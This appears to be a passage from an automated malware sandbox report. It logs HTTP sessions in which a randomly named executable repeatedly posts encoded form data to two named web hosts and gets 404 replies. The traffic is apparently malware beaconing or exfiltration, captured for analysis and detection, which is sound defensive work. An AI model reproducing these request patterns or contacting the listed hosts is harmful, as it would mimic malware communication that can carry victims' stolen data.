                                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.105001974.208.236.156804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:43.304617882 CET730OUTPOST /uvge/ HTTP/1.1
                                                                            Host: www.christinascuties.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.christinascuties.net
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.christinascuties.net/uvge/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 55 50 39 4c 4f 71 38 43 35 45 7a 4c 72 74 7a 76 72 75 64 64 4c 43 49 58 2b 2b 32 53 63 37 72 33 58 42 78 77 76 4e 6a 41 43 61 4c 7a 6f 50 37 4f 75 59 61 4b 4f 64 70 74 2f 4c 42 31 6e 64 57 79 34 59 7a 57 5a 2b 35 59 61 6b 69 32 75 47 6f 5a 65 62 33 78 4e 58 2f 6d 32 50 37 39 52 43 55 2f 65 6f 7a 78 70 7a 43 47 4a 2b 62 4b 4e 35 65 65 49 53 7a 6b 4b 4e 2b 50 6e 50 69 58 49 54 44 6f 4c 31 36 66 42 57 53 75 59 30 76 44 48 6d 65 6d 68 31 42 32 67 72 51 48 48 4f 6e 45 7a 4b 55 6b 46 38 46 68 67 6f 38 55 61 51 48 45 4a 79 41 41 50 71 2b 7a 68 5a 6b 6f 31 35 63 49 6c 79 42 61 66 69 48 44 34 58 39 39 49 32 35 41 44 43 66 64 78 41 3d 3d
                                                                            Data Ascii: GX6Lp2F=UP9LOq8C5EzLrtzvruddLCIX++2Sc7r3XBxwvNjACaLzoP7OuYaKOdpt/LB1ndWy4YzWZ+5Yaki2uGoZeb3xNX/m2P79RCU/eozxpzCGJ+bKN5eeISzkKN+PnPiXITDoL16fBWSuY0vDHmemh1B2grQHHOnEzKUkF8Fhgo8UaQHEJyAAPq+zhZko15cIlyBafiHD4X99I25ADCfdxA==
                                                                            Nov 24, 2024 08:24:44.480386019 CET580INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Sun, 24 Nov 2024 07:24:44 GMT
                                                                            Server: Apache
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.105002074.208.236.156804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:46.226701021 CET1743OUTPOST /uvge/ HTTP/1.1
                                                                            Host: www.christinascuties.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.christinascuties.net
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.christinascuties.net/uvge/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 55 50 39 4c 4f 71 38 43 35 45 7a 4c 72 74 7a 76 72 75 64 64 4c 43 49 58 2b 2b 32 53 63 37 72 33 58 42 78 77 76 4e 6a 41 43 61 7a 7a 6f 5a 76 4f 68 62 79 4b 50 64 70 74 6a 62 42 77 6e 64 57 56 34 59 37 53 5a 2b 39 49 61 68 6d 32 6f 55 51 5a 4f 36 33 78 43 58 2f 6d 2f 76 37 2b 56 43 56 72 65 75 54 31 70 7a 53 47 4a 2b 62 4b 4e 2f 53 65 42 6e 54 6b 4d 4e 2b 4d 67 50 69 79 5a 6a 44 4d 4c 31 54 71 42 57 48 56 59 45 50 44 45 47 75 6d 6a 41 64 32 73 72 51 2f 4c 75 6e 63 7a 4b 59 46 46 38 59 65 67 74 6f 75 61 54 58 45 49 54 68 4e 54 71 32 2f 30 35 73 47 78 61 34 52 74 6d 42 71 53 79 2b 69 2b 43 6c 36 58 47 51 66 49 47 43 4e 72 43 65 77 42 33 50 66 44 75 52 30 46 44 44 55 7a 41 34 63 63 38 31 6a 70 4f 75 53 37 52 70 69 32 66 35 61 2b 35 6c 59 4f 5a 68 47 6e 34 58 6d 31 78 36 77 59 55 54 47 65 42 68 64 79 73 58 61 32 73 68 67 39 70 44 55 57 67 30 4b 51 32 65 62 37 5a 6b 38 6f 4d 4a 79 67 56 57 36 43 6d 6f 6e 6c 7a 4b 39 79 78 35 36 75 4d 39 39 38 63 52 68 32 47 46 31 2f 75 57 43 39 75 [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=UP9LOq8C5EzLrtzvruddLCIX++2Sc7r3XBxwvNjACazzoZvOhbyKPdptjbBwndWV4Y7SZ+9Iahm2oUQZO63xCX/m/v7+VCVreuT1pzSGJ+bKN/SeBnTkMN+MgPiyZjDML1TqBWHVYEPDEGumjAd2srQ/LunczKYFF8YegtouaTXEIThNTq2/05sGxa4RtmBqSy+i+Cl6XGQfIGCNrCewB3PfDuR0FDDUzA4cc81jpOuS7Rpi2f5a+5lYOZhGn4Xm1x6wYUTGeBhdysXa2shg9pDUWg0KQ2eb7Zk8oMJygVW6CmonlzK9yx56uM998cRh2GF1/uWC9u/KzBX6JVBVRmVFBQMFRgYLKJUZ2Z71f+3Oe5nX0St6HKMBdKFD8rav+dU+KgRWFOdoH5j3GCOh4z8r4fi1fCt0VxiVI9WW0MqhC/kRsR9vNjB3+khUFiGozGbotCrmHNLxyfELaNJjFiW5GRu4E+yq8ER+6OAAiF0j7QPJODQp+R6WnrUCgYpfIDqScJmascAnT1RQnKsqU7mRAv11Q5IR4chNvq0mcJZddB4YqaAt3zYE+64XKAMBbR+U/SE4eSuQqDDGFeBWVtJP2rcQbTAKe7J8O1Qs/hzfU0AjpSj/l+Qz8zxDJtpHNE6GA4jT4JRdzoCcAFvrRDVIdpv8QlReslmjh56DNxyBVb6gRcDAf0XoCvndgY91zwm06W6ApOpKFCzAlWDf6fGeUXvLnTguroYURtItFFuY6OqAQifAdkLCGgZVM5BVkKr2+jgWPuNpIztmCfVtNj2rtgu5nNjT2saHE2s2LwUHFTGFBdYK/fNrStcb60sFs4z632dyp5+yGR5wLHIn9s2ePRVxtI/Ozul/oabo+E17vg6j5OaJh5pQZT/gdLsJLzNF5jhijAAX69bkbyzJvvy5Nb4vbeT8lUvBxwNO3n/7LyNHPfigV3vQHyYnKgLGDCHjbRqOIxXActqaNC19VXo4x53FY2BD2i58xujiCoIu [TRUNCATED]
                                                                            Nov 24, 2024 08:24:47.407911062 CET580INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Sun, 24 Nov 2024 07:24:47 GMT
                                                                            Server: Apache
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.2.105002174.208.236.156804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:48.889106989 CET430OUTGET /uvge/?H8=BpFD-28hKhrD&GX6Lp2F=ZNVrNdoQnhuwr8rXgpUIPH4b9LjaUdnqJW8zgtLXFLLe8onm6IbnH5k6/OJNpvCzw5jcHu1YLU/U3UlnXJzWKm/g482Cdi9CT/rc1yKmW5XeMaWPeg== HTTP/1.1
                                                                            Host: www.christinascuties.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:24:50.032517910 CET770INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 626
                                                                            Connection: close
                                                                            Date: Sun, 24 Nov 2024 07:24:49 GMT
                                                                            Server: Apache
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.2.105002268.66.226.92804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:55.938232899 CET673OUTPOST /bokt/ HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.717hy.net
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.717hy.net/bokt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 6b 71 61 32 45 41 4a 45 6d 56 7a 7a 4c 31 4c 48 66 6e 6e 2f 39 51 78 56 79 30 66 58 49 75 71 30 6c 6c 62 67 42 72 43 55 55 78 58 4f 73 6f 56 47 74 4d 64 42 59 75 37 45 6d 49 50 37 72 6f 37 75 57 35 36 43 42 72 36 6f 70 63 45 6a 2f 58 4f 69 68 6c 67 47 50 41 71 69 45 53 6b 34 6d 54 32 48 37 41 51 44 2f 42 5a 66 74 31 49 42 56 37 34 31 5a 78 4d 33 32 75 4a 50 62 66 6e 76 76 6f 68 79 72 4a 2f 71 59 65 55 2f 4f 75 35 48 2b 62 4c 7a 30 4d 50 2f 74 6b 37 35 2f 61 71 62 34 65 6f 31 65 38 50 73 77 7a 30 36 42 35 47 5a 42 62 42 2f 30 74 79 54 6f 63 79 61 67 6c 56 38
                                                                            Data Ascii: GX6Lp2F=kqa2EAJEmVzzL1LHfnn/9QxVy0fXIuq0llbgBrCUUxXOsoVGtMdBYu7EmIP7ro7uW56CBr6opcEj/XOihlgGPAqiESk4mT2H7AQD/BZft1IBV741ZxM32uJPbfnvvohyrJ/qYeU/Ou5H+bLz0MP/tk75/aqb4eo1e8Pswz06B5GZBbB/0tyTocyaglV8
                                                                            Nov 24, 2024 08:24:57.221766949 CET1159INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:24:57 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            42192.168.2.105002368.66.226.92804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:24:58.610086918 CET697OUTPOST /bokt/ HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.717hy.net
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.717hy.net/bokt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 6b 71 61 32 45 41 4a 45 6d 56 7a 7a 4b 52 50 48 5a 45 50 2f 34 77 78 57 2b 55 66 58 42 4f 71 77 6c 6c 6e 67 42 70 79 45 55 44 44 4f 73 4b 64 47 73 4e 64 42 5a 75 37 45 73 6f 50 36 32 34 37 6e 57 35 6e 39 42 76 36 6f 70 63 34 6a 2f 57 65 69 68 30 67 46 4f 51 71 67 4c 79 6b 36 69 54 32 48 37 41 51 44 2f 48 31 6d 74 32 34 42 56 71 49 31 49 67 4d 6f 2b 4f 4a 41 4e 76 6e 76 34 34 68 32 72 4a 2f 49 59 63 73 5a 4f 74 42 48 2b 62 62 7a 30 64 50 38 6e 6b 37 33 31 36 72 74 30 2b 39 36 51 4e 76 56 32 6a 67 79 54 36 76 34 50 61 38 34 6c 38 54 45 37 72 75 55 75 6a 67 57 69 4c 32 73 38 31 61 42 6b 6f 4f 65 36 64 34 58 70 65 35 79 77 51 3d 3d
                                                                            Data Ascii: GX6Lp2F=kqa2EAJEmVzzKRPHZEP/4wxW+UfXBOqwllngBpyEUDDOsKdGsNdBZu7EsoP6247nW5n9Bv6opc4j/Weih0gFOQqgLyk6iT2H7AQD/H1mt24BVqI1IgMo+OJANvnv44h2rJ/IYcsZOtBH+bbz0dP8nk7316rt0+96QNvV2jgyT6v4Pa84l8TE7ruUujgWiL2s81aBkoOe6d4Xpe5ywQ==
                                                                            Nov 24, 2024 08:24:59.880987883 CET1159INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:24:59 GMT
                                                                            server: LiteSpeed
                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-content-type-options: nosniff
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            43192.168.2.105002468.66.226.92804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:25:01.271647930 CET1710OUTPOST /bokt/ HTTP/1.1
                                                                            Host: www.717hy.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.717hy.net
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.717hy.net/bokt/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 6b 71 61 32 45 41 4a 45 6d 56 7a 7a 4b 52 50 48 5a 45 50 2f 34 77 78 57 2b 55 66 58 42 4f 71 77 6c 6c 6e 67 42 70 79 45 55 44 37 4f 74 2f 4a 47 74 75 31 42 61 75 37 45 76 6f 50 33 32 34 36 6c 57 35 2b 30 42 76 2b 34 70 61 38 6a 2b 32 43 69 78 51 30 46 45 51 71 67 4f 43 6b 37 6d 54 33 61 37 41 41 50 2f 48 46 6d 74 32 34 42 56 6f 41 31 49 78 4d 6f 34 4f 4a 50 62 66 6e 6a 76 6f 67 72 72 4a 57 71 59 63 6f 76 4f 64 68 48 2b 2f 48 7a 79 76 33 38 39 6b 37 31 79 36 72 6c 30 2b 67 36 51 4d 44 33 32 67 38 49 54 36 48 34 4c 4c 56 43 77 38 4b 59 71 36 2b 78 79 56 73 64 78 50 2b 34 79 58 44 34 76 49 69 2f 76 66 59 44 76 76 6f 4e 6c 6d 62 30 2b 50 76 5a 6a 73 32 4a 72 4a 36 59 31 51 50 48 78 37 6d 71 59 70 50 43 30 61 77 67 51 56 30 53 77 70 58 75 30 70 4b 6d 39 49 63 66 2b 64 70 58 33 68 4a 72 4b 6a 77 68 73 67 42 63 44 51 69 4b 6e 68 58 68 49 56 51 68 6e 61 57 79 47 56 31 51 79 58 4e 2f 6e 32 34 57 39 6e 4a 38 4f 63 53 79 6d 63 76 5a 4a 41 